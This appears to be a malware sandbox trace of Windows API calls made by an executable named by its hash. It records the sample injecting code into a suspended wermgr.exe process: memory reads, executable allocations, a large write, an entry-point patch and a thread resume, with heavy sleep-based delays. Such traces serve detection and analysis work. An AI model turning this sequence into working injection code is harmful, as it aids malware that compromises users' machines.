[0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.957] GetLastError () returned 0x0 [0078.957] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.957] GetLastError () returned 0x0 [0078.957] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.957] GetLastError () returned 0x0 [0078.957] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.957] GetLastError () returned 0x0 [0078.957] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.957] GetLastError () returned 0x0 [0078.957] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.957] GetLastError () returned 0x0 [0078.957] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.957] GetLastError () returned 0x0 [0078.957] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.957] GetLastError () returned 0x0 [0078.957] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.957] GetLastError () returned 0x0 [0078.957] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.957] GetLastError () returned 0x0 [0078.957] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.957] GetLastError () returned 0x0 [0078.957] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.957] GetLastError () returned 0x0 [0078.957] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.957] GetLastError () returned 0x0 [0078.957] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.957] GetLastError () returned 0x0 [0078.957] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.957] GetLastError () returned 0x0 [0078.957] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.957] GetLastError () returned 0x0 [0078.957] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.957] GetLastError () returned 0x0 [0078.958] RtlWow64EnableFsRedirectionEx () returned 0x0 [0078.958] GetSystemDirectoryW (in: lpBuffer=0x1993d0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0078.959] GetProcAddress (hModule=0x74650000, lpProcName="CreateProcessInternalW") returned 0x746907d0 [0078.959] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\wermgr.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x800000c, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x19a464*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0), lpProcessInformation=0x1993b0, hNewToken=0x199398 | out: lpProcessInformation=0x1993b0*(hProcess=0x1fc, hThread=0x1f8, dwProcessId=0x750, dwThreadId=0x770), hNewToken=0x199398*=0x0) returned 1 [0079.337] RtlWow64EnableFsRedirectionEx () returned 0x0 [0079.338] Sleep (dwMilliseconds=0x101) [0079.617] RtlWow64EnableFsRedirectionEx () returned 0x0 [0079.617] GetSystemDirectoryW (in: lpBuffer=0x1993d0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0079.618] GetProcAddress (hModule=0x74650000, lpProcName="CreateProcessInternalW") returned 0x746907d0 [0079.618] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x800000c, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x19a464*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0), lpProcessInformation=0x1993b0, hNewToken=0x199398 | out: lpProcessInformation=0x1993b0*(hProcess=0x200, hThread=0x204, dwProcessId=0xb8c, dwThreadId=0xcf0), hNewToken=0x199398*=0x0) returned 1 [0080.333] RtlWow64EnableFsRedirectionEx () returned 0x0 [0080.347] Sleep (dwMilliseconds=0x1bd) [0080.892] TerminateProcess (hProcess=0x200, uExitCode=0x0) returned 1 [0080.898] CloseHandle (hObject=0x204) returned 1 [0080.898] CloseHandle (hObject=0x200) returned 1 [0080.905] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x6f0000 [0080.905] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x40) returned 0x2020000 [0080.906] VirtualAlloc (lpAddress=0x0, dwSize=0x2bdb8, flAllocationType=0x3000, flProtect=0x40) returned 0x23a0000 [0080.947] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0080.955] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0080.961] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0080.969] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0081.007] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0081.025] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0081.051] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0081.206] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0081.214] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0081.337] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0081.360] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0081.381] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0081.398] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.405] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.457] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.485] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.500] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.514] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.522] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.526] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.532] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.593] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.596] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.599] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.603] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.609] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.612] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.617] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.620] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.623] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.640] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.647] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.673] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.678] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.703] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.707] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.710] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.728] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.733] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.766] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.800] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.948] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.988] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.994] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0081.999] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.017] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.027] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.037] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.040] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.067] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.078] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.093] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.097] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.115] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.120] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.124] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.131] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.160] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.216] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.222] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.234] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.241] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.305] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.309] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.312] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.318] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.336] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.339] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.384] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.393] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.399] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.406] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.411] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.414] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.422] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.427] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.433] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.437] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.441] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.445] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.452] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.456] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.473] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.478] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.503] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.510] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.636] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.649] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.658] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.672] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.776] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.805] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.840] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.845] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.856] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.862] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.886] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.890] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.896] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.900] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.944] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.949] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.954] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.965] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0082.969] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.019] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.025] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.030] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.034] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.042] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.089] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.097] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.111] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.121] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.128] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.131] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.134] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.136] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.139] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.145] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.149] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.151] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.195] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.209] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.226] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.285] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.291] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.332] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.335] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.338] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.342] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.351] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.353] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.364] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.365] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.367] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.369] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.408] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.417] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.477] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.491] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.494] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.498] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.503] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.510] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.512] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.515] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.521] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.527] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.530] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.534] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.544] NtDelayExecution (Alertable=0, Interval=0x197c78*=-10000) returned 0x0 [0083.579] NtQueryInformationProcess (in: ProcessHandle=0x1fc, ProcessInformationClass=0x0, ProcessInformation=0x197d50, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x197d50, ReturnLength=0x0) returned 0x0 [0083.580] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0083.586] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0083.592] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0083.602] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0083.610] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0083.616] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0083.630] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0083.635] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0083.645] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0083.687] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0083.691] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0083.696] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0083.707] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0083.877] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-30000) returned 0x0 [0083.894] NtReadVirtualMemory (in: ProcessHandle=0x1fc, BaseAddress=0x3c0010, Buffer=0x197d80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x197d88 | out: Buffer=0x197d80*, NumberOfBytesRead=0x197d88*=0x8) returned 0x0 [0083.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x197d28*=0x0, ZeroBits=0x0, RegionSize=0x197cc0*=0x1000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x197d28*=0x2080000, RegionSize=0x197cc0*=0x1000) returned 0x0 [0083.906] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-20000) returned 0x0 [0083.956] NtReadVirtualMemory (in: ProcessHandle=0x1fc, BaseAddress=0x7ff6efcf0000, Buffer=0x2080000, NumberOfBytesToRead=0x1000, NumberOfBytesRead=0x197d88 | out: Buffer=0x2080000*, NumberOfBytesRead=0x197d88*=0x1000) returned 0x0 [0083.960] NtProtectVirtualMemory (in: ProcessHandle=0x1fc, BaseAddress=0x197cd0*=0x7ff6efcf8360, NumberOfBytesToProtect=0x197cc8, NewAccessProtection=0x40, OldAccessProtection=0x197cc0 | out: BaseAddress=0x197cd0*=0x7ff6efcf8000, NumberOfBytesToProtect=0x197cc8, OldAccessProtection=0x197cc0*=0x20) returned 0x0 [0083.961] NtAllocateVirtualMemory (in: ProcessHandle=0x1fc, BaseAddress=0x197da0*=0x0, ZeroBits=0x0, RegionSize=0x197d98*=0x29000, AllocationType=0x1000, Protect=0x40 | out: BaseAddress=0x197da0*=0x100000, RegionSize=0x197d98*=0x29000) returned 0x0 [0083.963] NtWriteVirtualMemory (in: ProcessHandle=0x1fc, BaseAddress=0x100000, Buffer=0x23a0000*, NumberOfBytesToWrite=0x28db8, NumberOfBytesWritten=0x197d88 | out: Buffer=0x23a0000*, NumberOfBytesWritten=0x197d88*=0x28db8) returned 0x0 [0084.106] NtWriteVirtualMemory (in: ProcessHandle=0x1fc, BaseAddress=0x7ff6efcf8360, Buffer=0x197db0*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x197d88 | out: Buffer=0x197db0*, NumberOfBytesWritten=0x197d88*=0x10) returned 0x0 [0085.165] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-20000) returned 0x0 [0085.172] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-20000) returned 0x0 [0085.191] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-20000) returned 0x0 [0085.218] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-20000) returned 0x0 [0085.223] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-20000) returned 0x0 [0085.226] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-20000) returned 0x0 [0085.232] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-20000) returned 0x0 [0085.238] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-20000) returned 0x0 [0085.272] NtResumeThread (in: ThreadHandle=0x1f8, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0085.272] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-20000) returned 0x0 [0085.352] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-20000) returned 0x0 [0085.931] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-20000) returned 0x0 [0086.645] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-20000) returned 0x0 [0088.074] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-20000) returned 0x0 [0088.124] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-20000) returned 0x0 [0088.132] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-20000) returned 0x0 [0088.139] NtDelayExecution (Alertable=0, Interval=0x197cc8*=-20000) returned 0x0 [0088.183] SleepEx (dwMilliseconds=0x1039, bAlertable=0) returned 0x0 [0092.360] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0x748 Process: id = "2" image_name = "wermgr.exe" filename = "c:\\windows\\system32\\wermgr.exe" page_root = "0x4917c000" os_pid = "0x750" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe6c" cmd_line = "C:\\Windows\\system32\\wermgr.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 352 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 353 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 354 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = 